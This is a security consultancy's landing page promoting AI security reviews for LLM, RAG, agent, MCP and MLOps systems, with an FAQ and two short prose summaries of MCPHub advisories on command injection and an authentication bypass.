AI Security Hub
A practical hub for LLM, RAG, agent, MCP, model file, and MLOps security decisions before AI systems reach production.
Prompt injection that becomes data exposure or unauthorized tool execution.
RAG systems that retrieve sensitive content without permission-aware controls.
Untrusted model artifacts entering production without quarantine or provenance.
Built For
Security teams reviewing AI applications, copilots, and agent workflows.
Product and engineering teams preparing AI launches under real data risk.
Governance leaders who need technical evidence for AI risk decisions.
Use Cases
Scope AI app security reviews across prompts, tools, retrieval, identity, and logs.
Prioritize RAG/KVKK, model backdoor, and MLOps supply-chain testing.
Connect technical findings to assessment, red team, and audit workflows.
Related Content
Related Advisories
Unauthenticated Remote Code Execution via Arbitrary Command Injection in MCPHub Server Registration
MCPHub accepts attacker-controlled command and args values during server registration and spawns them through STDIO, enabling full remote code execution on the host.
Authentication Bypass via skipAuth Configuration Grants Full Admin Access in MCPHub
When skipAuth is enabled, MCPHub bypasses both authentication and admin authorization checks, allowing any unauthenticated user to access privileged API functionality.
Frequently Asked Questions
When should an AI system be security tested?
Before production, after major model or tool changes, and whenever the system gains access to sensitive data, actions, or external integrations.
Is AI security only prompt testing?
No. Serious AI security covers identity, data boundaries, retrieval, tools, model files, logging, monitoring, and incident response.
Need help validating this attack surface?
Talk with Eresus Security about scoped testing, threat modeling, and remediation priorities for this workflow.
Talk to Eresus